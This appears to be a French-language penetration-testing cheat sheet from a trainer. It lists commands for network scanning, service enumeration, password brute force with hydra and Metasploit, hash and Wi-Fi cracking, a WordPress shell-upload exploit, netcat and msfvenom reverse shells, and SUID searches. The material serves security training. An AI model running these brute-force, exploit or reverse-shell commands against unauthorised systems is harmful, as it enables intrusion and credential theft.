Scanning

ARP

netdiscover -i $INTERFACE
netdiscover -i $INTERFACE -r $RANGE
netdiscover -i $INTERFACE -p
nmap -sn $RANGE

NetBIOS

nbtscan -r $RANGE

Port scanning

nmap -A $TARGET
nmap -p- $TARGET
nmap $TARGET
nmap -F $TARGET
nmap -v -Pn -p0-65535 -T4 $TARGET
nmap -Pn -sC -sV -p "20-25,53,80,135,139,443,445" $TARGET
nmap -Pn --script vuln -sV -p "20-25,53,80,135,139,443,445" $TARGET
nmap -sU -sV --top-ports 20 $TARGET
masscan -e $INTERFACE -p0-65535,U:0-65535 --max-rate 100000 $TARGETS

Enumération

nikto -h http://$IP

FTP (port 21)

telnet -vn $IP $PORT
nmap -sS -sV -p21 $IP

ftp $IP
> anonymous
> anonymous

$ msfconsole
msf > use auxiliary/scanner/ftp/anonymous
msf auxiliary(anonymous) > set RHOSTS $IP
msf auxiliary(anonymous) > set THREADS 55
msf auxiliary(anonymous) > run

crackmapexec ftp $IP[/24] -u anonymous -p anonymous

SSH (port 22)

ssh $username@$IP
ssh -i key.txt $username@$IP
ssh $username@$IP -t "bash --noprofile"
ssh -v $IP
nc -vn $IP 22
ssh-keyscan -t rsa $IP -p $PORT
nmap -sV -p22 $IP
nmap -p22 -n -sV --script ssh2-enum-algos $IP

Telnet (port 23)

nmap -sV -p23 $IP
telnet $IP $PORT

SMTP (port 25-587)

nmap -p25 --script smtp-commands $IP
nmap --script smtp-enum-users $IP
swaks --to $destinataire --server $serveur_SMTP

$ msfconsole
msf > use auxiliary/scanner/smtp/smtp_enum
msf auxiliary(smtp_enum) > set RHOSTS $IP
msf auxiliary(smtp_enum) > run

DNS (port 53)

nmap -v -sV -p 53 $SUBNET/$MASK
nmap -v -sV -sU -p 53 $SUBNET/$MASK
dig +short ns $domaine
dnsenum $domaine
nslookup -type=ptr $IP_address
dnsrecon -r $RANGE -n $DC_IP
nmap --script dns-srv-enum --script-args dns-srv-enum.domain=$FQDN_DOMAIN

SNMP (port 161-162)

$ msfconsole
msf > use auxiliary/scanner/snmp/snmp_enum
msf auxiliary(snmp_enum) > set RHOSTS $IP
msf auxiliary(snmp_enum) > run

$ msfconsole
msf > use auxiliary/scanner/snmp/snmp_enumshares
msf auxiliary(snmp_enumshares) > set RHOSTS $IP
msf auxiliary(snmp_enumshares) > set THREADS 11
msf auxiliary(snmp_enumshares) > run

$ msfconsole
msf > use auxiliary/scanner/snmp/snmp_enumusers
msf auxiliary(snmp_enumusers) > set RHOSTS $IP
msf auxiliary(snmp_enumusers) > set THREADS 11
msf auxiliary(snmp_enumusers) > run

SMB (port 445-139)

nmap -sS -sV -p139-445 $IP
nmap -p139-445 --script=smb-vuln* $IP
smbclient --list //$IP
smbmap -H $IP
smbclient --no-pass --list //$IP
smbclient --user ''%'' --list //$IP
smbmap -u '' -p '' -H $IP
smbclient //$IP/$SHARE_NAME
crackmapexec smb $TARGETS -u '' -p '' --shares
crackmapexec smb $IP -u '$username' -p '$password' --shares
crackmapexec smb $IP -u '$username' -H '$hash' --shares
crackmapexec smb $IP -u '$username' -p '$password' --spider C$ --pattern txt
mount -t cifs //$IP/$Fichier /mnt/partage
mount -t cifs -o "username=$username,password=$password" //$IP/$Fichier /mnt/partage

RDP (port 3389)

nmap -A -p3389 $IP
rdesktop -u $username $IP
rdesktop -d $domain -u $username -p $password $IP
xfreerdp /u:[domain\]$username /p:$password /v:$IP
xfreerdp /u:[domain\]$username /pth:$hash /v:$IP
crackmapexec rdp $IP --nla-screenshot

MySQL (port 3306)

nmap -sV -p3306 $IP
mysql -h $IP -u $username -p

Web Application Firewall (WAF)

wafw00f $URL
whatwaf -u $URL
nmap -p $PORT --script=http-waf-fingerprint,http-waf-detect $URL

John The Ripper

john hash
zip2john file.zip > pass.hash
john --wordlist=/usr/share/wordlists/rockyou.txt pass.hash

Directory Bruteforce

dirb http://$IP/
dirb http://$IP/ -X .txt
dirb http://$IP/ /usr/share/wordlists/dirb/big.txt
gobuster dir -u http://$IP[:$PORT] -w /usr/share/wordlists/dirb/big.txt
gobuster vhost -u $domain -w /usr/share/wordlists/dirb/big.txt | grep 200

Bruteforce

cewl http://$IP/ -w dict.txt

FTP (port 21)

nmap --script ftp-* -p21 $IP
hydra -l $user -s 21 -P $path_pass_list $IP -t 4 ftp
hydra -L usernames.txt -P passwords.txt $IP ftp

SSH (port 22)

hydra -l $user -s 22 -P $path_pass_list $IP -t 4 ssh

Telnet (port 23)

$ msfconsole
msf > use auxiliary/scanner/telnet/telnet_login
msf auxiliary(scanner/telnet/telnet_login) > set rhosts $IP
msf auxiliary(scanner/telnet/telnet_login) > set user_file user.txt
msf auxiliary(scanner/telnet/telnet_login) > set pass_file pass.txt
msf auxiliary(scanner/telnet/telnet_login) > set stop_on_success true
msf auxiliary(scanner/telnet/telnet_login) > exploit

SNMP (port 161-162)

$ msfconsole
msf > use auxiliary/scanner/snmp/snmp_login
msf auxiliary(snmp_login) > set RHOSTS $IP
msf auxiliary(snmp_login) > set THREADS 200 #par exemple
msf auxiliary(snmp_login) > run

SMB (port 445-139)

hydra -L usernames.txt -P passwords.txt $IP -V -f smb
nmap --script smb-brute -p 445 $IP
crackmapexec smb $IP/24 -u user.txt -p pass.txt

RDP (port 3389)

hydra -L user.txt -P pass.txt $IP rdp

MySQL (port 3306)

$ msfconsole
msf > use auxiliary/scanner/mysql/mysql_login
msf auxiliary(scanner/mysql/mysql_login) > set rhosts $IP
msf auxiliary(scanner/mysql/mysql_login) > set user_file user.txt
msf auxiliary(scanner/mysql/mysql_login) > set pass_file pass.txt
msf auxiliary(scanner/mysql/mysql_login) > exploit

nmap -p3306 --script=mysql-brute --script-args userdb=user.txt,passdb=pass.txt $IP

Encoding / Decoding

echo "$BASE64_STRING" | base64 -d

Exploitation

aircrack-ng -w /usr/share/wordlists/rockyou.txt file.cap

Shell amélioré

python -c 'import pty;pty.spawn("/bin/bash")'

Python Web Server

python -m SimpleHTTPServer   # Python 2 ; équivalent Python 3 : python3 -m http.server

CMS

wpscan --url http://$IP/$wordpress_path/ --enumerate
wpscan --url http://$IP/$wordpress_path/ -U usr -P /usr/share/wordlists/rockyou.txt
joomscan $IP
joomscan -u http://$IP/joomla

$ msfconsole
msf > use exploit/unix/webapp/wp_admin_shell_upload
msf exploit(unix/webapp/wp_admin_shell_upload) > set rhosts $IP
msf exploit(unix/webapp/wp_admin_shell_upload) > set username admin
msf exploit(unix/webapp/wp_admin_shell_upload) > set password Password@123
msf exploit(unix/webapp/wp_admin_shell_upload) > set targeturi /$wordpress_path/
msf exploit(unix/webapp/wp_admin_shell_upload) > exploit

Recherche d'exploits

searchsploit $technology
searchsploit -x $exploit_path
searchsploit -m $exploit_path
searchsploit -u

Reverse Shell

nc -lvp $PORT
nc -e /bin/bash $IP $PORT
msfvenom -p cmd/unix/reverse_python lhost=$IP lport=$PORT R

WebDav

cadaver http://$IP/webdav

Steganography

steghide extract -sf image.jpeg

Post-Exploitation

find / -type f -perm -ug=rwx 2>/dev/null
find / -perm -u=s -type f 2>/dev/null

Formateur

Bertrand LECLERCQ

Security Developer / Pentester
